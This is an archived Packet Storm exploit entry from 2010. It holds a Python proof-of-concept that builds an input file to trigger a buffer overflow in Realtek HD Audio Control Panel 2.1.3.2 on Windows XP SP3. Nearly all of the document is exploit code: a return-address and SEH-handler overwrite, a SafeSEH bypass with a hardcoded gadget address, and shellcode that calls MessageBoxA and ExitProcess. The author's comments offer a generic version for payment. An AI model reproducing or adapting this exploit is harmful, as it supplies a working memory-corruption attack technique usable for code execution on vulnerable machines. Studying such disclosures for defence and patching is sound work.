Realtek HD Audio Control Panel 2.1.3.2 Buffer Overflow

2010-11-15T00:00:00
ID PACKETSTORM:95830
Type packetstorm
Reporter BraniX
Modified 2010-11-15T00:00:00

Description

```python
# done by BraniX <branix@hackers.org.pl>
# www.hackers.org.pl
# found: 2010.08.24
# tested on: Windows XP SP3 Home Edition
# SafeSEH bypass

# App. has a classic buffer overflow vulnerability.
# It can be triggered by passing a too-long argument
# as a startup parameter. Shellcode can be run via classic
# ret overwrite or SEH handler overwrite ... so it's a mini-combo ;)

# Ps. If you need a generic exploit ...
# (no hardcoded VAs), write it yourself ;) or 'donate few' $$$
# we will c0de it for You ^^

# Note: the original PoC was written for Python 2; bytes literals and a
# context manager were added so the same file is produced under Python 3.
filepath = "C:\\ShellCode\\RTHDCPL 2.1.3.2 - Exploit.bin"

with open(filepath, "wb") as f:
    f.write(b'A'*4)
    f.write(b'\x5E')  # pop esi
    f.write(b'\x5E')  # pop esi
    f.write(b'\xC3')  # ret
    f.write(b'\x90')  # nop

    f.write(b'[BraniX]')
    f.write(b'A'*448)  # mock

    f.write(b'\xEB\x06')  # jmp +6
    f.write(b'\x90')  # nop
    f.write(b'\x90')  # nop

    f.write(b'\x70\x01\xA5\x01')  # pop; pop; ret; address

    f.write(b'\x83\xC1\x0C')  # add ecx, 0Ch
    f.write(b'\x88\x01')  # mov byte ptr [ecx], al
    f.write(b'\x83\xE9\x08')  # sub ecx, 08
    f.write(b'\x50')  # push eax
    f.write(b'\x51')  # push ecx
    f.write(b'\x51')  # push ecx
    f.write(b'\x50')  # push eax
    f.write(b'\xE8\xC5\x08\x27\x7E')  # call user32.MessageBoxA

    f.write(b'\x50')  # push eax
    f.write(b'\xE8\xE7\xCB\x6E\x7C')  # call kernel32.ExitProcess

    f.write(b'\xCC'*1500)  # int 3's

print("Done ...")
```